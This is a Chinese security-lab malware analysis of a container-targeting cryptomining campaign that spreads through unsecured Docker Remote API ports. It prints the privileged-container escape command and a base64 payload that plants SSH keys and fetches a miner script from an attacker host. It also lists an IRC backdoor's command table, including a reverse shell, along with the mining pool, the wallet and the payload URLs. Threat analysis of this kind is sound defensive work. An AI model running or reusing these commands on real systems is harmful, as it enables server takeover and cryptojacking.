样本的开发时间大约在2021年09月14日编写完毕,云鼎实验室哨兵系统在9月14号第一时间捕获,并进行了详细的分析。
哨兵捕获的网络包:
样本流行程度:
通过哨兵智能情报统计系统,样本在刚刚爆发的2周内较为流行,随后感染率持续下降。
TEAM***的新样本通过docker remote API传播,过程中使用了 特权容器,容器逃逸,LKM rootkit 等先进攻击方式,下面是对于整个攻击过程的ATT&CK矩阵。
下图为攻击流程,我们将整个过程分为五个部分讲解:1、初始化访问与对外扫描 2、执行3、权限提升-容器逃逸 4、攻击持久化 5、防御绕过
3.1 攻击向量-初始访问与横向扫描—Remote API 漏洞:
DockerRemote API :是一个取代远程命令行界面(rcli)的REST API,默认绑定2375端口。Docker Remote API如配置不当可导致未授权访问,攻击者利用 docker client 或者 http 直接请求就可以访问这个 API,可能导致敏感信息泄露,黑客也可以删除Docker上的数据。攻击者可进一步利用Docker自身特性,直接访问宿主机上的敏感信息,或对敏感文件进行修改,最终完全控制服务器。
A、扫描获取docker API版本
调用masscan 和 zgrab扫描目标IP,通过请求旧版本的命令,可以获取到最新的docker API版本。
相关代码如下:
B、利用Remote API漏洞:
直接通过Remote API漏洞,远程启动传播病毒的容器镜像 alpineos/dockerapi,容器使用完成后会自动清除容器内部的文件系统。启动alpine 容器进行容器逃逸。
通过腾讯云容器安全服务TCSS发现存在Remote API未授权访问风险节点和详细信息:
3.2 攻击向量-执行:
在目标机器上的命令执行通过特权容器执行恶意指令,进行挖矿和病毒传播。
A、恶意镜像alpineos/dockerapi:
经查询,alpineos帐号注册时间为2021年5月26日,其中alpineos/dockerapi镜像更新时间为截止目前已有一个月,大约有7600台主机被感染。
通过腾讯云容器安全服务TCSS对该镜像进行扫描,发现该镜像存在木马病毒,扫描结果如下图:
镜像启动时会执行名为pause的脚本,pause脚本用于病毒的传播。
B、镜像Alpine
正规白镜像,镜像大小只有5M,方便下载,team***使用这个镜像进行容器逃逸。
3.3攻击向量-权限提升----Docker逃逸:
docker -H $D_TARGET run -d --privileged --net host -v /:/host alpine
chroot /host bash -c 'echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKCmNoYXR0ciAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IHRudHJlY2h0IC1SIC1pYSAvc**vdC8uc3NoLyAyPi9kZXYvbnVsbDsgaWNoZGFyZiAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGwKY2F0IC90bXAvVGVhbVROVC5wdWIgPj4gL3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMKY2F0IC90bXAvVGVhbVROVC5wdWIgPiAvc**vdC8uc3NoL2F1dGhvcml6ZWRfa2V5czIKcm0gLWYgL3RtcC9UZWFtVE5ULnB1YgoKCnNzaCAtb1N0cmljdEhvc3RLZXlDaGVja2luZz1ubyAtb0JhdGNoTW9kZT15ZXMgLW9Db25uZWN0VGltZW91dD01IC1pIC90bXAvVGVhbVROVCByb290QDEyNy4wLjAuMSAiKGN1cmwgaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHxjZDEgaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHx3Z2V0IC1xIC1PLSBodHRwOi8vdGVhbXRudC5yZWQvc2gvc2V0dXAvbW9uZXJvb2NlYW5fbWluZXIuc2h8fHdkMSAtcSAtTy0gaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNoKXxiYXNoIgoKcm0gLWYgL3RtcC9UZWFtVE5UCgo= | base64 -d | bash'
3.4攻击向量-防御绕过----清理痕迹与进程隐藏:
3.5攻击向量—持久化—释放远控
TEAM***会下载Chimaera IRC 远控木马,木马没有加壳,功能较为丰富,这里不做过多介绍。
相关命令和描述如下图所示:
Command |
Description (from the binary) |
NICK <nick> |
Changes the nick of the client |
SERVER <server> |
Changes servers |
GETSPOOFS |
Gets the current spoofing |
SPOOFS <subnet> |
Changes spoofing to a subnet |
DISABLE |
Disables all packeting from this client |
ENABLE |
Enables all packeting from this client |
GET <http address> <save as> |
Downloads a file off the web and saves it onto the hd |
UPDATE <http address> <src:bin> |
Update this bot |
HACKPKG <http address> <bin name> |
HackPkg is here! Install a bin, using http, no depends! |
VERSION |
Requests version of client |
HELP |
Displays this |
IRC <command> |
Sends this command to the server |
SH <command> |
Executes a command |
ISH <command> |
SH, interactive, sends to channel |
SHD <command> |
Executes a pseudo-daemonized command |
GETBB <tftp server> |
Get a proper busybox |
INSTALL <http server/file_name> |
Download & install a binary to /var/bin |
BASH <cmd> |
Execute commands using bash. |
BINUPDATE <http:server/package> |
Update a binary in /var/bin via wget |
SCAN <nmap options> |
Call the nmap wrapper script and scan with your opts. |
RSHELL <server> <port> |
Equates to nohup nc ip port -e /bin/sh |
LOCKUP <http:server> |
Kill telnet, d/l aes backdoor from <server>, run that instead. |
GETSSH <http:server/dropbearmulti> |
D/l, install, configure and start dropbear on port 30022 |
TOETEDENCLIENT |
Kill client |
UPDATE |
update |
还原ps命令,并清理定时任务,有些挖矿木马存在修改系统命令:
挖矿信息总结:
矿池:dl.chimaera.cc:21582
钱包:89sp1qMoognSAbJTprreTXXUv9RG1AJBRjZ3CFg4rn6afQ5hRuqxiWRivYNqZbnYKKdsH5pCiTffrZToSyzXRfMvSHx5Guq
首选挖矿程序:http://teamtnt.red/sh/bin/xmrig/x86_64/mo.tar.gz
备用挖矿程序:https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-linux-static-x64.tar.gz
URL:http://teamtnt.red/sh/setup/moneroocean_miner.sh;http://teamtnt.red/sh/setup/diamorphine.sh
本文作者:YDclub
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/168020.html